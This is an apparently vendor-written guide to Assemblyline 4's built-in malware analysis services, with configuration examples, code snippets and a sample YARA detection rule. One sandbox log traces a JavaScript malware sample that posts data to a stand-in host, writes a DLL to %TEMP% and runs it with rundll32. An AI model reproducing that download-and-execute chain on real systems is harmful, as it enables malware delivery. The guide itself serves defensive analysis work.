Assemblyline 4 is a popular open-source private malware repository. Arguably the most powerful feature of Assemblyline 4 is the capability to chain many malware analysis services together for comprehensive and highly customisable artifact triage and analysis.
Each Assemblyline service performs a specific function (similar to the “microservices” pattern often used in software architecture). These services can be chained together to process files, extract relevant information, and evaluate potential threats, and a chain can run many times over to peel back multiple layers of obfuscation. This gives us deep insight into binaries, documents, and other file artefacts while keeping the samples local to our Assemblyline instance and using the best-of-breed analysis tools that help us understand them best. It also allows us to score each file to assess whether it’s malicious, suspicious, or benign.
In this guide, we’ll dive into Assemblyline’s most useful managed (built-in) services you can incorporate into your analysis workflows.
Organisations using Assemblyline 4 often fall into one or more of these categories:
If you’re considering Assemblyline for your organisation, check out our hosted Assemblyline 4 service, MalwareZoo. MalwareZoo gives you access to powerful and private malware analysis and storage capabilities (including all the built-in services featured in this guide) without the operations and infrastructure pain.
Utilise common Windows API calls to construct a representation called an ApiVector, used to analyse and classify Windows binaries.
ApiVector is especially useful for comparing incoming samples against a collection of known ApiVectors. These vectors can be sourced from Malpedia, and the service can regularly pull updates from that source. Users can also generate their own ApiVectors, typically as a CSV file.
ApiVector offers parameters for matching ApiVectors, including minimum confidence and minimum Jaccard score, which determine the level of matching and reporting for detected malware families.
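To make the minimum Jaccard score more concrete, here is a minimal sketch of a plain Jaccard similarity over two sets of API names. It is an illustration only: real ApiVectors are compact, weighted vectors rather than simple sets, and the function name and sample API sets below are hypothetical.

```python
def jaccard(a: set[str], b: set[str]) -> float:
    """Return |a ∩ b| / |a ∪ b|, or 0.0 when both sets are empty."""
    union = a | b
    if not union:
        return 0.0
    return len(a & b) / len(union)


# Hypothetical API sets for an incoming sample and a known family reference
sample_apis = {"CreateFileW", "WriteFile", "VirtualAlloc", "CreateRemoteThread"}
family_apis = {
    "CreateFileW",
    "VirtualAlloc",
    "CreateRemoteThread",
    "WinExec",
    "RegSetValueExW",
}

MIN_JACCARD = 0.40  # assumed threshold, mirroring the service's min_jaccard option

score = jaccard(sample_apis, family_apis)
is_match = score >= MIN_JACCARD
print(f"jaccard={score:.2f} match={is_match}")
```

Raising the threshold trades missed matches for fewer false positives, which is the trade-off the service's TPR/FPR notes describe.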
Service configuration options available for the APIVector service:
# Parameters for matching apivector
# minimum confidence in the apivector match to do anything with it
"min_confidence": 50,
# min jaccard score to report as implant family
# from https://journal.cecyf.fr/ojs/index.php/cybin/article/view/2 , you can set this depending on your
# tolerance for false positives.
# Even if set very high, FPs are still possible for samples that share a lot of statically linked code
# * 0.18 leads to a TPR/FPR of 90.18% and 9.45%
# * 0.22 leads to a TPR/FPR of 89.10% and 4.74% (closest distance to the (0,1) point)
# * 0.32 leads to a TPR/FPR of 86.55% and 0.99%
# * 0.55 leads to a TPR/FPR of 80.72% and 0.09%
"min_jaccard": 0.40
The CAPA Service is essentially a wrapper around the core functionalities of mandiant/capa, offering streamlined access to its capabilities. Mandiant/capa detects capabilities in executable files. For example, it might suggest that a given file is a backdoor, is capable of installing services, or relies on HTTP to communicate.
For submission parameters and configuration, users can specify the renderer, which dictates the output format. Currently, there are three renderers available: "simple," "default," and "verbose," each offering varying levels of information presentation. The "default" renderer mirrors CAPA’s default output, showcasing information in three tables: ATT&CK, MBC, and other capabilities.
ViperMonkey emulates VBA code execution, allowing analysts to understand how a potentially malicious macro behaves without executing it in a live environment. Its primary purpose is to analyse and deobfuscate malicious VBA macros found in Microsoft Office files such as Word, Excel and PowerPoint documents. The service also tracks intermediate IOCs generated during macro execution, including dropped files and injected shellcode bytes.
APKaye helps analysts to uncover insights about Android applications. It decompiles and inspects Android APKs, providing information on network indicators and details extracted from the APK manifest file. It combines three tools under the hood to achieve this:
A Python script to deobfuscate a batch script that is obfuscated with string substitution and escape character techniques.
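The two techniques named above can be sketched in a few lines of Python. This is a simplified illustration, not the service's implementation: it only handles caret escapes and plain `set NAME=VALUE` / `%NAME%` substitution, it strips carets before expanding variables (cmd.exe does these in a different order), and the function names and sample script are hypothetical.

```python
import re


def strip_carets(line: str) -> str:
    """Remove cmd.exe caret escapes: '^x' becomes 'x', '^^' becomes '^'."""
    return re.sub(r"\^(.)", r"\1", line)


def expand_variables(script: str) -> list[str]:
    """Track 'set NAME=VALUE' assignments and expand %NAME% in later lines."""
    variables: dict[str, str] = {}
    output = []
    for raw in script.splitlines():
        line = strip_carets(raw.strip())
        # Expand known variables and leave unknown ones untouched
        line = re.sub(
            r"%(\w+)%",
            lambda m: variables.get(m.group(1).lower(), m.group(0)),
            line,
        )
        assignment = re.match(r'(?i)set\s+"?(\w+)=([^"]*)"?$', line)
        if assignment:
            variables[assignment.group(1).lower()] = assignment.group(2)
        else:
            output.append(line)
    return output


# Hypothetical obfuscated batch script
obfuscated = "set a=pow\nset b=ershell\n%a%%b% -n^op -c^ommand calc"
deobfuscated = expand_variables(obfuscated)
print(deobfuscated)
```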
A static script de-obfuscator designed to extract obfuscated Indicators of Compromise (IOCs)
This service scans for ASCII and Unicode strings that may be indicators of compromise (IOCs).
It utilises Balbuzard's bbcrack tool for XOR transformation, searching for specific IOCs. It also extracts Unicode, Hex, and ASCII-Hex strings, particularly useful for potential shellcode. Finally, it tags IOC pattern matches.
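As a rough illustration of the XOR search idea, the sketch below brute-forces every single-byte XOR key and keeps the keys whose output contains a URL. It is an assumption-laden simplification: bbcrack supports many more transforms and patterns, and the regular expression, function names, and sample data here are hypothetical.

```python
import re

# Simplified URL pattern, for illustration only
URL_PATTERN = re.compile(rb"https?://[\w.-]+(?:/[\w./?=&%-]*)?")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single-byte key."""
    return bytes(b ^ key for b in data)


def find_xor_urls(data: bytes) -> dict[int, list[bytes]]:
    """Try each single-byte key (1-255) and record keys that reveal a URL."""
    hits = {}
    for key in range(1, 256):
        matches = URL_PATTERN.findall(xor_bytes(data, key))
        if matches:
            hits[key] = matches
    return hits


# Hypothetical sample: a URL XOR-encoded with key 0x5A, padded with bytes
# that decode to spaces under the same key
secret = b"http://example.com/payload.bin"
blob = b"zz" + xor_bytes(secret, 0x5A) + b"zz"
hits = find_xor_urls(blob)
print(hits)
```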
Overpower de-obfuscates and assesses PowerShell files. It employs modified open-source tools for this purpose, including PSDecode (a PowerShell script used to de-obfuscate encoded PowerShell scripts) and PowerShellProfiler, which de-obfuscates and normalises script content, then profiles it to identify behavioural indicators.
This service uses the LIEF library to analyse Linux executable (ELF) files and provides metadata about each file. LIEF is a cross-platform library for parsing, modifying and abstracting the ELF, PE and MachO formats. It also provides an API to access and potentially modify internal structures.
This service wraps the elfparser library and makes the output easily viewable in the Assemblyline UI.
ELF-based malware targets files using the ELF (Executable and Linkable Format) binary format. ELF is a common format used for executables, object code, and shared libraries in Unix-like operating systems, such as Linux. This service provides static analysis and quick access to information about ELF binaries and insight on whether a given binary is suspicious or malicious.
The ELFPARSER CLI provides detailed output, including the score of analysed files, scoring reasons, and detected capabilities. It can identify network functions, process manipulation functions, environment variable manipulation, shell commands, packed files, hard-coded IPv4 addresses, anti-debug techniques, and dropper functionality.
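For readers unfamiliar with the format, here is a minimal sketch that reads the first fields of an ELF header using only Python's standard library. It does not use elfparser or LIEF, it covers only a handful of header fields, and the function name and hand-built test header are hypothetical.

```python
import struct

ELF_MAGIC = b"\x7fELF"
ELF_CLASSES = {1: "ELF32", 2: "ELF64"}
ELF_TYPES = {1: "relocatable", 2: "executable", 3: "shared object", 4: "core"}


def parse_elf_header(data: bytes) -> dict:
    """Read the class, byte order, file type and machine from an ELF header."""
    if len(data) < 20 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    if ei_data not in (1, 2):
        raise ValueError("unknown ELF data encoding")
    # e_type and e_machine follow the 16-byte e_ident block
    byte_order = "<" if ei_data == 1 else ">"
    e_type, e_machine = struct.unpack_from(byte_order + "HH", data, 16)
    return {
        "class": ELF_CLASSES.get(ei_class, "unknown"),
        "endianness": "little" if ei_data == 1 else "big",
        "type": ELF_TYPES.get(e_type, "other"),
        "machine": e_machine,  # e.g. 62 is x86-64, 3 is Intel 80386
    }


# Hand-built header for illustration: 64-bit, little-endian, executable, x86-64
header = ELF_MAGIC + bytes([2, 1, 1, 0]) + bytes(8) + struct.pack("<HH", 2, 62)
info = parse_elf_header(header)
print(info)
```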
Compiling ELFPARSER:
docker run -u 0 --rm -v $(path_to_extracted_elfparser_source_code):/tmp/elfparser -it cccs/assemblyline-v4-service-base /bin/bash
apt update
apt install -y cmake libboost-all-dev build-essential
mkdir /tmp/elfparser/build
cd /tmp/elfparser/build
cmake ..
make
A wrapper service around GOVCERT-LU/eml_parser used to extract information from .eml files including attachments (hashes and filenames), address fields, received servers path, email subject, and a list of URLs parsed from the email content. The output can easily be converted to JSON.
Example JSON output from EmlParser:
{
  "body": [
    {
      "content_header": {
        "content-language": [
          "en-US"
        ]
      },
      "hash": "6c9f343bdb040e764843325fc5673b0f43a021bac9064075d285190d6509222d"
    }
  ],
  "header": {
    "received_src": null,
    "from": "john.doe@example.com",
    "to": [
      "test@example.com"
    ],
    "subject": "Sample EML",
    "received_foremail": [
      "test@example.com"
    ],
    "date": "2013-04-26T11:15:47+00:00",
    "header": {
      "content-language": [
        "en-US"
      ],
      "received": [
        "from localhost\tby mta.example.com (Postfix) with ESMTPS id 6388F684168\tfor <test@example.com>; Fri, 26 Apr 2013 13:15:55 +0200"
      ],
      "to": [
        "test@example.com"
      ],
      "subject": [
        "Sample EML"
      ],
      "date": [
        "Fri, 26 Apr 2013 11:15:47 +0000"
      ],
      "message-id": [
        "<F96257F63EAEB94C890EA6CE1437145C013B01FA@example.com>"
      ],
      "from": [
        "John Doe <john.doe@example.com>"
      ]
    },
    "received_domain": [
      "mta.example.com"
    ],
    "received": [
      {
        "with": "esmtps id 6388f684168",
        "for": [
          "test@example.com"
        ],
        "by": [
          "mta.example.com"
        ],
        "date": "2013-04-26T13:15:55+02:00",
        "src": "from localhost by mta.example.com (postfix) with esmtps id 6388f684168 for <test@example.com>; fri, 26 apr 2013 13:15:55 +0200"
      }
    ]
  }
}
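To show where fields like these come from, the sketch below pulls a few headers from a raw message using Python's standard-library `email` module. It is not eml_parser and does not reproduce its output format; the sample message and the `summarise` helper are hypothetical, and the helper assumes the From, To, Subject and Date headers are all present.

```python
from email import message_from_bytes, policy
from email.utils import getaddresses

# Hypothetical raw message, loosely based on the sample output above
RAW = (
    b"From: John Doe <john.doe@example.com>\r\n"
    b"To: test@example.com\r\n"
    b"Subject: Sample EML\r\n"
    b"Date: Fri, 26 Apr 2013 11:15:47 +0000\r\n"
    b"Content-Type: text/plain; charset=utf-8\r\n"
    b"\r\n"
    b"Hello from the sample message.\r\n"
)


def summarise(raw: bytes) -> dict:
    """Extract sender, recipients, subject and ISO 8601 date from an email."""
    msg = message_from_bytes(raw, policy=policy.default)
    return {
        "from": getaddresses([str(msg["From"])])[0][1],
        "to": [addr for _, addr in getaddresses([str(msg["To"])])],
        "subject": str(msg["Subject"]),
        "date": msg["Date"].datetime.isoformat(),
    }


summary = summarise(RAW)
print(summary)
```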
This service analyses JAR files by extracting, decompiling and analysing all classes for malicious behaviour using the CFR decompiler tool. Potentially malicious files are included in the results for analyst review.
The Suricata Service scans network capture files using signatures and extracts files from the network capture. It uses three rulesets by default:
Analyse Microsoft OLE (Object Linking and Embedding) and XML documents for metadata extraction and network information, while also identifying anomalies. Oletools utilises the Python libraries py-oletools and hachoir to provide a comprehensive assessment of potentially malicious content.
For each analysed file Oletools provides individual macro analysis (including SHA256 hashes and suspicious strings detection), extraction of embedded document streams, identification of malicious Class Identifiers, and detection of suspicious XML/OLE stream features like FrankenStrings IOC Patterns, Adobe Flash content, Base64 and Hex encoded content, and MSO DDE Links.
Decode obfuscated XLM macros (also known as Excel 4.0 macros). A wrapper service for XLMMacroDeobfuscator which uses an internal XLM emulator to interpret the macros without fully executing the code.
The PDFId service wraps PDFId (Version 2.7) and PDFParser (Version 7.4) to extract metadata and objects from PDF files.
PDFId reports the PDF header string, counts of various elements (objects, streams, etc.) and metadata such as modification date, creation date, etc.
PDFParser reports the number of different PDF elements (Comment, XREF, etc.), extracts PDF elements like comments, trailer, startXref, and extracts suspicious elements flagged by PDFId plugins.
A wrapper around the PeePDF library used to report file information, heuristics, and other items of interest about PDFs, including CVE identifiers, embedded files, JavaScript and URL detection. The ultimate goal of PeePDF is to give security researchers all the information and tools they might possibly need when analysing PDF files.
Characterize is a file information extraction service. It divides the file into partitions and calculates visual entropy for each partition as well as utilising hachoir-metadata and exiftool commands to extract metadata information from the file.
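The per-partition entropy idea can be sketched as follows. This is an assumed, minimal version using Shannon entropy over byte frequencies; the partition count, function names, and sample data are hypothetical and are not taken from the service.

```python
import math
from collections import Counter


def shannon_entropy(chunk: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input, 8.0 at most)."""
    if not chunk:
        return 0.0
    total = len(chunk)
    return -sum(
        (count / total) * math.log2(count / total)
        for count in Counter(chunk).values()
    )


def partition_entropy(data: bytes, partitions: int = 4) -> list[float]:
    """Split data into roughly equal partitions and score each one."""
    size = max(1, math.ceil(len(data) / partitions))
    return [shannon_entropy(data[i:i + size]) for i in range(0, len(data), size)]


# Hypothetical sample: 256 zero bytes followed by every byte value once
data = bytes(256) + bytes(range(256))
scores = partition_entropy(data, partitions=2)
print(scores)
```

Low values suggest padding or repetitive data, while values close to 8 bits per byte often point to compressed or encrypted content.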
Checks the metadata of a submitted file to look for anomalies with a focus on common techniques that spam writers use to lure victims to click on embedded files. This includes checking for things like double file extensions, empty file names, excessive use of whitespace and bi-directional unicode control characters.
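A few of these checks are easy to picture in code. The sketch below is a simplified assumption of how such filename checks might look; the extension list, whitespace threshold, and function name are hypothetical and do not reflect the service's actual rules.

```python
import re

# Unicode bidirectional control characters (embeddings, overrides, isolates)
BIDI_CONTROLS = set("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069")
# Illustrative list only, not the service's own
RISKY_EXTENSIONS = {"exe", "scr", "js", "vbs", "bat", "lnk"}


def filename_anomalies(name: str) -> list[str]:
    """Return a list of suspicious traits found in a file name."""
    findings = []
    stem = name.rsplit(".", 1)[0] if "." in name else name
    if not stem.strip():
        findings.append("empty file name")
    parts = name.lower().split(".")
    if (
        len(parts) >= 3
        and parts[-1] in RISKY_EXTENSIONS
        and 2 <= len(parts[-2].strip()) <= 4
    ):
        findings.append("double file extension")
    if re.search(r"\s{5,}", name):
        findings.append("excessive whitespace")
    if any(ch in BIDI_CONTROLS for ch in name):
        findings.append("bidirectional control character")
    return findings


print(filename_anomalies("invoice.pdf.exe"))
print(filename_anomalies("photo\u202egpj.exe"))
```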
This service combines elements from six different open-source projects to comprehensively analyse and score JavaScript malware using signatures. The core components of the service are:
1. Malware Jail, which provides a sandbox for semi-automatic malware analysis, deobfuscation, and payload extraction.
2. Box.js, a sandbox for studying JavaScript malware.
3. JS-X-Ray for static analysis via SAST scanning.
4. Synchrony to deobfuscate JavaScript obfuscated with obfuscator.io.
5. WScript Emulator emulates/traces Windows Script Host functionality.
6. GootLoaderAutoJsDecode for automatic decoding of Gootloader files using static analysis.
Malware Jail example output:
bash@linux# node jailme.js malware/example.js
11 Jan 00:06:24 - Malware sandbox ver. 0.2
11 Jan 00:06:24 - ------------------------
11 Jan 00:06:24 - Sandbox environment sequence: env/eval.js,env/wscript.js
11 Jan 00:06:24 - Malware files: malware/example.js
11 Jan 00:06:24 - Output file for sandbox dump: sandbox_dump_after.json
11 Jan 00:06:24 - Output directory for generated files: output/
11 Jan 00:06:24 - ==> Preparing Sandbox environment.
11 Jan 00:06:24 - => Executing: env/eval.js
11 Jan 00:06:24 - Preparing sandbox to intercept eval() calls.
11 Jan 00:06:24 - => Executing: env/wscript.js
11 Jan 00:06:24 - Preparing sandbox to emulate WScript environment.
11 Jan 00:06:24 - ==> Executing malware file(s).
11 Jan 00:06:24 - => Executing: malware/example.js
11 Jan 00:06:24 - ActiveXObject(WScript.Shell)
11 Jan 00:06:24 - Created: WScript.Shell[1]
11 Jan 00:06:24 - WScript.Shell[1].ExpandEnvironmentStrings(%TEMP%)
11 Jan 00:06:24 - ActiveXObject(MSXML2.XMLHTTP)
11 Jan 00:06:24 - Created: MSXML2.XMLHTTP[2]
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].open(POST,http://EXAMPLE.COM/redir.php,false)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].setRequestHeader(Content-Type, application/x-www-form-urlencoded)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].send(iTlOlnxhMXnM=0.588860877091065&jndj=IT0601)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Not sending data, if you want to interract with remote server, set --down=y
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Calling onreadystatechange() with dummy data
11 Jan 00:06:24 - ActiveXObject(ADODB.Stream)
11 Jan 00:06:24 - Created: ADODB_Stream[3]
11 Jan 00:06:24 - ADODB_Stream[3].Open()
11 Jan 00:06:24 - ADODB_Stream[3].Write(str) - 10001 bytes
11 Jan 00:06:24 - ADODB_Stream[3].SaveToFile(%TEMP%\57020551.dll, 2)
11 Jan 00:06:24 - WScript.Shell[1].Exec(rundll32 %TEMP%\57020551.dll, DllRegisterServer)
11 Jan 00:06:24 - ADODB_Stream[3].Close()
11 Jan 00:08:42 - ==> Script execution finished, dumping sandbox environment to a file.
11 Jan 00:08:42 - Saving: output/_TEMP__49629482.dll
11 Jan 00:08:42 - Saving: output/_TEMP__38611354.pdf
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - The sandbox context has been saved to: sandbox_dump_after.json
Extract malware configurations, such as IP addresses, URLs, and domains, using the ConfigExtractor Python library. It works with multiple extraction frameworks, including MWCP and CAPE (with MACO output).
Python usage example for the ConfigExtractor Service:
from configextractor.main import ConfigExtractor
import logging
# Create a logger to track what is happening
logger = logging.getLogger()
logger.handlers = [logging.StreamHandler()]
logger.setLevel('DEBUG')
# Instantiate instance of class with path(s) to extractors
# Attaching a logger will allow some insight into what's going on if parser detection is the issue
cx = ConfigExtractor(["/path/to/extractors/"], logger=logger)
# List all parsers actively detected and loaded into instance
# cx.parsers.keys() lists all the relative module paths to the parsers
# The value of each key is an Extractor object containing details for running the extractor (ie. venv location, YARA rule, etc.)
print([cx.get_details(p)['name'] for p in cx.parsers.values()])
# Run all loaded parsers against sample
results = cx.run_parsers('/path/to/sample')
# Output raw results to stdout, each should be organized by the parsers that generated an output
print(results)
Floss uses the FireEye Labs Obfuscated String Solver (FLOSS) to identify obfuscated strings, including stacked strings, in Windows executable files.
It uses several different modules for string extraction, including static strings (in ASCII and UNICODE), decoded strings, and stacked strings. The output also includes strings matching IOC patterns of interest.
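The static-string part is the simplest of these to illustrate. The sketch below extracts printable ASCII and UTF-16LE strings with regular expressions; it is not FLOSS itself (decoded and stacked strings need emulation, which is not shown), and the function name, minimum length, and sample bytes are hypothetical.

```python
import re


def static_strings(data: bytes, min_len: int = 4) -> dict[str, list[str]]:
    """Extract printable ASCII and UTF-16LE strings of at least min_len chars."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return {
        "ascii": [m.decode("ascii") for m in ascii_re.findall(data)],
        "utf16le": [m.decode("utf-16-le") for m in wide_re.findall(data)],
    }


# Hypothetical binary blob with one ASCII and one wide string
blob = b"\x01\x02hello world\x00\x03" + "cmd.exe".encode("utf-16-le") + b"\x00\x00\xff"
found = static_strings(blob)
print(found)
```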
Designate a set of files as safe, preventing them from being scanned by Assemblyline in the future. The safelist can be populated either through predefined safelist sources or by users marking files as safe directly within the Assemblyline UI.
You can set up a safelist using a SQL database (similar to NSRL's format, with FILE and PKG tables) or a CSV file. You can also define trusted distributors using regular expressions to ensure the trustworthiness of your hashes.
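A CSV-backed safelist lookup could look roughly like the sketch below. The `sha256` and `name` column names, the sample data, and the helper functions are assumptions made for illustration and do not describe the service's actual schema.

```python
import csv
import hashlib
import io


def load_safelist(csv_text: str) -> set[str]:
    """Collect lower-cased SHA256 hashes from a CSV with a 'sha256' column."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return {row["sha256"].strip().lower() for row in reader if row.get("sha256")}


def is_safelisted(content: bytes, safelist: set[str]) -> bool:
    """Check whether the SHA256 of the file content is in the safelist."""
    return hashlib.sha256(content).hexdigest() in safelist


# Hypothetical safelist containing one known-good file
known_good = b"known good installer"
csv_text = "sha256,name\n" + hashlib.sha256(known_good).hexdigest().upper() + ",installer.msi\n"
safelist = load_safelist(csv_text)

print(is_safelisted(known_good, safelist))
print(is_safelisted(b"something else", safelist))
```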
Integrates with popular AV products like Kaspersky, Skyhigh, ESET, Bitdefender, WithSecure, and Sophos, supporting either ICAP or HTTP requests. Users can integrate with additional antivirus products by providing details like the product name, IP address, port, update period, and optional file size limit. You can also manage false positives by revising the scores in the Assemblyline interface or by identifying and adjusting any signatures causing issues.
Source: CybercentreCanada/assemblyline-service-antivirus. Managing a false positive in the AntiVirus Service.
Two services in one: YARA and TagCheck. The YARA service runs the YARA application against all file types. It currently supports various external modules such as Dotnet, ELF, Hash, Magic, Math, and PE. The YARA rules adhere to the CCCS standard.
TagCheck is a post-processing service that compares all tags generated by other services to a signature set using YARA signatures. It utilises the same code as the YARA service but populates the YARA externals features with all the tags generated by other services.
By default, the TagCheck service runs a small set of signatures mainly geared toward dynamic analysis results analysis (say that three times fast!), with its signature format following the CCCS standard but with added external features to reference Assemblyline tags inside signatures.
Example TagCheck signature format:
rule UPX_Packer_PE_Section {
    meta:
        version = "1.0"
        description = "Identifies UPX packer by PE section names"
        source = "CCCS"
        author = "assemblyline_devs@CCCS"
        status = "RELEASED"
        sharing = "TLP:WHITE"
        category = "TECHNIQUE"
        technique = "packer:UPX"
        mitre_att = "T1045"
    condition:
        al_file_pe_sections_name matches /UPX[0-9]/
}
Check and optionally submit files/URLs to VirusTotal for analysis (BYO free or paid API key) using the v3 REST API. Because doing so will transfer the file externally to VirusTotal, initiating a request for analysis will prompt the user and warn them that the file and related metadata will leave the Assemblyline system.
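The difference between checking and submitting matters for privacy: a hash lookup sends only the SHA256, not the file. The sketch below builds (but does not send) such a lookup request against the VirusTotal v3 files endpoint using the standard library. The helper name and placeholder API key are hypothetical, and this is not how the Assemblyline service itself is implemented.

```python
import hashlib
import urllib.request

VT_FILES_ENDPOINT = "https://www.virustotal.com/api/v3/files/{}"


def build_vt_lookup(sha256: str, api_key: str) -> urllib.request.Request:
    """Build a GET request that looks up an existing report by file hash."""
    return urllib.request.Request(
        VT_FILES_ENDPOINT.format(sha256),
        headers={"x-apikey": api_key, "Accept": "application/json"},
    )


# Hypothetical file content and placeholder key; nothing is sent here
sha256 = hashlib.sha256(b"sample file content").hexdigest()
request = build_vt_lookup(sha256, "YOUR_API_KEY")
print(request.get_method(), request.full_url)
```

Passing the request to `urllib.request.urlopen` would perform the lookup, at which point the hash leaves your environment.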
Submit files to a CAPEv2 deployment and receive parsed reports (users are responsible for setting up the CAPE nest and victim machines). The service retrieves analysis results for the detonation of a submitted file in a victim, displaying a summarised version of the report in the Assemblyline UI. The full report is also available in the Assemblyline UI as a supplementary file. Files that are unpacked and saved to disk are fed back into Assemblyline.
Fetch the Intezer Analyze report for the SHA256 of a submitted file. Optionally, if the SHA256 is not found on the Intezer Analyze instance, the service will submit the file. Created by x1mus with support from Sorakurai and reynas at NVISO, the service is now maintained by the Canadian Centre for Cyber Security.
This service calls the Intezer Analyze API with the hash of the file and returns the results. Prior to making the request, the user will be warned that their file or metadata related to their file will leave the Assemblyline system.
An image analysis service combining Optical Character Recognition (OCR) via Tesseract and optional steganography modules (recommended for academic use only). The OCR process can be configured to look for specific terms, such as terms commonly related to ransomware.
Example term inclusion and exclusion for the PixAxe service:
config:
  ocr:
    ransomware:
      include: ['bad1', 'bad2', ...]
      exclude: ['bank account']
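One way to picture how include and exclude lists might combine is sketched below. It assumes that included terms are added to a default term set and excluded terms are removed from it; that behaviour, the default terms, and the function names are all assumptions for illustration rather than the service's documented logic.

```python
# Hypothetical default terms; the real defaults are not listed in this guide
DEFAULT_TERMS = {"bitcoin", "decrypt", "bank account"}


def effective_terms(defaults: set[str], include: list[str], exclude: list[str]) -> set[str]:
    """Add included terms to the defaults, then drop excluded terms."""
    return (set(defaults) | set(include)) - set(exclude)


def find_terms(ocr_text: str, terms: set[str]) -> list[str]:
    """Return the terms that appear in the OCR text, case-insensitively."""
    text = ocr_text.lower()
    return sorted(term for term in terms if term.lower() in text)


terms = effective_terms(DEFAULT_TERMS, include=["bad1", "bad2"], exclude=["bank account"])
hits = find_terms("Send BITCOIN to decrypt your files. bad1 bank account", terms)
print(hits)
```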
A wrapper around the Python pyswf library to extract metadata and perform anomaly detection on 'audiovisual/flash' files (SWF).
Extract metadata, calculated data (torrent type, number of pieces, last piece size, torrent size) and file path, file length and MD5Sum information from torrent files.
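The calculated values follow from simple arithmetic on the torrent's total size and piece length. A minimal sketch, with a hypothetical function name and example figures:

```python
def piece_stats(total_size: int, piece_length: int) -> dict[str, int]:
    """Derive the piece count and last piece size from size and piece length."""
    if total_size <= 0 or piece_length <= 0:
        raise ValueError("sizes must be positive")
    pieces = (total_size + piece_length - 1) // piece_length  # ceiling division
    last_piece = total_size - (pieces - 1) * piece_length
    return {
        "torrent_size": total_size,
        "number_of_pieces": pieces,
        "last_piece_size": last_piece,
    }


# Hypothetical torrent: 1,000,000 bytes split into 256 KiB pieces
stats = piece_stats(1_000_000, 262_144)
print(stats)
```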
Create URI files for URIs extracted by other services based on their score or other specified criteria.
Download seemingly malicious URLs using MAS' Kangooroo utility.
Unpack UPX packed executables for further analysis.
Facilitates the submission of PE32 binaries to the unpac.me API and provides the results. UnpacMe is an automated malware unpacking service. Users of this service will need to bring their own UnpacMe API key (Community or Subscription).
Assemblyline is also compatible with a range of community created and maintained services, listed here. However, note that these services are not managed or officially endorsed by the Assemblyline team.
If your organisation is exploring Assemblyline and the available services listed here, take a look at our SaaS Assemblyline 4 product, MalwareZoo. MalwareZoo offers robust malware analysis and storage capabilities in a private environment, including all the built-in services outlined in this guide. Getting Assemblyline up and running for production purposes takes some work - work Cosive has already done for you!
MalwareZoo is fully installed, maintained, upgraded and secured by our team at Cosive, so your team can focus on what they do best: understanding and defending against malware. We’d love to hear about your malware analysis challenges and how we might be able to help.
Hero photo by Simon Kadula on Unsplash.